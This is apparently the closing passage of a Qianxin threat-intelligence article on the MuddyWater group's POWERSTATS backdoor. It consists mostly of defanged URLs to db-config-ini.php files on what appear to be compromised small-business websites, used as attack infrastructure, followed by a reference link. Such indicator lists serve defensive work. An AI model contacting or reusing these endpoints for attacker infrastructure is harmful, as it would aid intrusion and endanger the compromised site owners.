hxxp://debnoch.com/image/db-config-ini.php
hxxp://gideonitesprojects.com//db-config-ini.php
hxxp://threelivingprojects.co.za//db-config-ini.php
hxxp://twinnovations.co.za/wp-includes/db-config-ini.php
hxxp://woodracefurniture.co.za/js/db-config-ini.php
hxxp://www.koshcreative.co.uk/wp-includes/db-config-ini.php
hxxps://www.3dremodel.com//db-config-ini.php
hxxp://iinvest4u.co.za/wp-includes/db-config-ini.php
hxxp://burgercoetzeeattorneys.co.za//db-config-ini.php
hxxp://h-u-i.co.za/heiren/db-config-ini.php
hxxp://insta-art.co.za//db-config-ini.php
hxxp://twickenhamsa.co.za/wp-includes/db-config-ini.php
hxxp://firstchoiceproperties.co.za//db-config-ini.php
hxxp://sikanderajam.com//db-config-ini.php
hxxp://muallematsela.com/wp-admin/db-config-ini.php
hxxp://pronette.co.za/images/db-config-ini.php
hxxp://sheqworld.co.za/js/db-config-ini.php
hxxp://slcmprojects.co.za/phpMailer/db-config-ini.php
hxxp://www.geotrading.ae//db-config-ini.php
hxxp://nbscorporation.co.za//db-config-ini.php
hxxps://www.bizxess.com//db-config-ini.php
hxxp://perfectlabels.net//db-config-ini.php
hxxp://susinternational.com//db-config-ini.php
hxxp://www.obaidsaqerbusit.com//db-config-ini.php
hxxps://www.aboserver.xyz/wp-includes/db-config-ini.php
hxxp://www.bestdecorativemirrors.com/More-Mirrors/db-config-ini.php
hxxp://www.m-3.co.za/wp-includes/db-config-ini.php
hxxp://beesrenovations.co.za/images/db-config-ini.php
hxxp://sefukaletrading.co.za/wpscripts/db-config-ini.php
hxxp://hellohealthy.pro/wp-includes/widgets/db-config-ini.php
hxxp://nrsp.org.pk/publications/db-config-ini.php
hxxp://paimantrust.org/wp-content/plugins/contact-form-7/includes/db-config-ini.php
hxxp://mokorotlocorporate.com//db-config-ini.php
hxxp://aeconafrica.com//db-config-ini.php
hxxp://alvesajewellery.com//db-config-ini.php
hxxp://in2accounting.co.za//db-config-ini.php
hxxp://rvnstudios.co.za/specials/db-config-ini.php
hxxp://chitchatdosti.com/wp-content/db-config-ini.php
hxxp://domusgroup.ae/wp-admin/db-config-ini.php
hxxp://elektroniksigaralab.com/wp-includes/db-config-ini.php
hxxp://www.alphapridesafaris.com//db-config-ini.php
hxxp://giginsulation.com/new/db-config-ini.php
hxxp://reesconsulting.co.za/wpimages/db-config-ini.php
hxxp://ntombizenhloso.co.za//db-config-ini.php
hxxp://thealtarofworship.co.za//db-config-ini.php
hxxp://cloudhub.co.ls/modules/db-config-ini.php
hxxp://www.olexco.ae/wp/db-config-ini.php
hxxp://ftu965.com/wp-includes/theme-compat/db-config-ini.php
hxxp://digital-cameras-south-africa.co.za/Templates/db-config-ini.php
hxxp://uptown-trading.zar.cc/ana/db-config-ini.php
hxxp://satwa.ae/wp-includes/Requests/db-config-ini.php
hxxp://satcomputers.co.za//db-config-ini.php
hxxp://boschxpress.com//db-config-ini.php
hxxp://hosthof.pk/customer/db-config-ini.php
hxxp://newtech-consulting.ae/templates/db-config-ini.php
hxxps://www.engeltjieakademie.co.za/wp-admin/db-config-ini.php
hxxp://juniorad.co.za/vendor/db-config-ini.php
hxxp://dryve.ae//db-config-ini.php
hxxp://2strongmagazine.co.za//db-config-ini.php
hxxp://binhamgroup.com/event/db-config-ini.php
hxxp://www.centreforgovernance.uk//db-config-ini.php
hxxp://bepovoblago.com//db-config-ini.php
hxxp://isgs.com.pk//db-config-ini.php
hxxp://balaateen.co.za/less/db-config-ini.php
hxxp://www.babypk.net/wp-admin/includes/db-config-ini.php
hxxp://labas-health.apps.ae/wp-content/themes/twentyfourteen/db-config-ini.php
hxxp://bntlaminates.com//db-config-ini.php
hxxp://serversvalley.com//db-config-ini.php
hxxp://courtesydriving.co.za/js/db-config-ini.php
hxxp://prommap.co.za//db-config-ini.php
hxxp://narcolepsy-symptom-treatment.org//db-config-ini.php
hxxps://zafarstocks.com/wp-includes/db-config-ini.php
hxxp://www.freshhub.ae/var/db-config-ini.php
hxxp://www.icsswaziland.com//db-config-ini.php
hxxp://askarisecurities.com.pk//db-config-ini.php
hxxp://funeralbusinesssolution.com/email_template/db-config-ini.php
hxxp://intellismartglobal.com/public_html/db-config-ini.php
hxxp://thelawyerscanvas.pk/wp-admin/db-config-ini.php
hxxp://sirketcv.com/css/dist/loop/db-config-ini.php
hxxps://3dprintingdubai.ae//db-config-ini.php
hxxp://symergy.co.za/wp-admin/db-config-ini.php
hxxp://hostingvalley.co.uk/downloads/db-config-ini.php
hxxp://haveytv.com//db-config-ini.php
hxxp://officialdivinea.com//db-config-ini.php
hxxp://www.ampleadminservices.com/wp-includes/db-config-ini.php
hxxp://www.ihlosiqs-pm.co.za//db-config-ini.php
hxxp://mtinetworkdubai.com//db-config-ini.php
hxxps://boilersinfo.com/wp-includes/db-config-ini.php
hxxp://aresebetseng.co.za/wp-includes/db-config-ini.php
hxxp://aleph.pk/administrator/modules/mod_menu/db-config-ini.php
hxxp://www.moboradar.com/wp-includes/db-config-ini.php
hxxp://blackthorn.co.za//db-config-ini.php
hxxp://tmkprojects.co.za//db-config-ini.php
hxxp://alaqaba.com//db-config-ini.php
hxxp://www.qsrimages.co.za/wp-admin/db-config-ini.php
hxxp://tamer.info/dle/engine/ajax/db-config-ini.php
hxxp://getabletravel.co.za/data1/db-config-ini.php
hxxps://quickauto.tools/wp-admin/db-config-ini.php
hxxp://printernet.co.za//db-config-ini.php
hxxp://get-paid-for-online-survey.com//db-config-ini.php
hxxp://abrahamseed.co.za/scripts/db-config-ini.php
hxxp://cybercraft.biz/AB/db-config-ini.php
hxxp://www.competitiveedoptions.com//db-config-ini.php
hxxp://www.humorcarbons.com/wp-includes/db-config-ini.php
hxxps://carepvtltdpk.com/index_videolb/thumbnails/db-config-ini.php
hxxp://intelligentprotection.co.za/wp-admin/db-config-ini.php
hxxp://lppaportal.org.ls/dist/db-config-ini.php
hxxp://satuwrite.com//db-config-ini.php
hxxp://orsiniconsulting.co.za/newsite/db-config-ini.php
hxxp://www.themusicstudio.co.za/wp-includes/db-config-ini.php
hxxp://incoso.co.za/images/db-config-ini.php
hxxp://aboutbodybuildingworkout.com//db-config-ini.php
hxxp://webhostinc.net//db-config-ini.php
hxxp://bitteeth.com/docbank/db-config-ini.php
hxxp://www.superlead.org/wp-includes/db-config-ini.php
hxxp://technicians.global//db-config-ini.php
hxxp://isound.co.za/wp-admin/db-config-ini.php
hxxps://www.pacificprime.ae//db-config-ini.php
hxxp://tandemtraining.co.za//db-config-ini.php
hxxp://aexergy.com//db-config-ini.php
hxxp://adriaanvorster.co.za/engines/db-config-ini.php
hxxp://www.gsmmid.com/wp-admin/db-config-ini.php
hxxp://24newstube.com/satu/db-config-ini.php
hxxp://goolinegaming.com//db-config-ini.php
hxxp://hisandherskennels.co.za/assets/sass/db-config-ini.php
hxxp://empowerbridge.com/projects/abianasystem/db-config-ini.php
hxxp://www.wdsc.co.za/wp-includes/db-config-ini.php
hxxp://projectartdivvy.com/wp-admin/maint/db-config-ini.php
hxxp://iqra.co.za/admin/db-config-ini.php
hxxp://thecompasssolutions.co.za//db-config-ini.php
hxxp://mailingservers.net//db-config-ini.php
hxxps://rstextilesourcing.com//db-config-ini.php
hxxp://quikteam.com/scripts/contrib/db-config-ini.php
hxxp://iggleconsulting.com//db-config-ini.php
hxxp://astrumtechnologies.co.za/templates/db-config-ini.php
hxxp://cupboardcure.co.za/vendor/db-config-ini.php
hxxp://www.blockdos.net/wp-admin/db-config-ini.php
hxxps://bednbreakfasthotel.com/wp-includes/db-config-ini.php
hxxp://broken-arrow.co.za//db-config-ini.php
hxxps://mayoorschoolabudhabi.com//db-config-ini.php
hxxp://www.goolinespace.com//db-config-ini.php
hxxp://www.simpleks.co.za/wp-includes/db-config-ini.php
hxxp://abanganifunerals.co.za/fonts/db-config-ini.php
hxxp://technics.pk/info/db-config-ini.php
hxxp://www.bhakkarrishtey.com//db-config-ini.php
hxxp://arabelaholdings.com/wpscripts/db-config-ini.php
hxxp://bestencouragementwords.com//db-config-ini.php
hxxp://myhealthmedical.ae//old/PHPMailer/extras/db-config-ini.php
hxxp://sjog.mw//db-config-ini.php
hxxp://www.phoenix.zar.cc/wp-includes/db-config-ini.php
hxxp://www.induworld.ae/wp-admin/db-config-ini.php
hxxp://legacybeautysalon.com/wp-content/plugins/contact-form-7/includes/db-config-ini.php
hxxp://prestbusiness.co.za//db-config-ini.php
hxxp://habibtextiles.pk/wp-admin/db-config-ini.php
hxxp://fsproperties.co.za/engine1/db-config-ini.php
hxxps://www.brandspeak.org/contact/include/db-config-ini.php
hxxp://bridgepakistan.org//db-config-ini.php
hxxp://realstar.co.za//db-config-ini.php
hxxp://www.afikagroup.com/wp-includes/db-config-ini.php
hxxp://molepetravel.co.ls/data1/db-config-ini.php
hxxp://iiee.edu.pk//db-config-ini.php
hxxp://cmhts.co.za/resources/db-config-ini.php
hxxp://www.organisejournalise.co.za//db-config-ini.php
hxxp://www.arabblower.com//db-config-ini.php
hxxp://cns.com.pk/wp-includes/theme-compat/db-config-ini.php
hxxp://domesticguardians.co.za/Banner/db-config-ini.php
hxxp://stubbornsystems.com//db-config-ini.php
hxxp://ahdaaf.ae/wp-admin/db-config-ini.php
hxxp://cazochem.co.za/cazochem/db-config-ini.php
hxxp://www.algom-law.com//db-config-ini.php
参考链接
[1] https://ti.qianxin.com/apt/detail/5b0d2e66596a10001cde7c79?name=MuddyWater&type=map
原文始发于微信公众号(奇安信威胁情报中心):深度剖析MuddyWater武器库之POWERSTATS后门
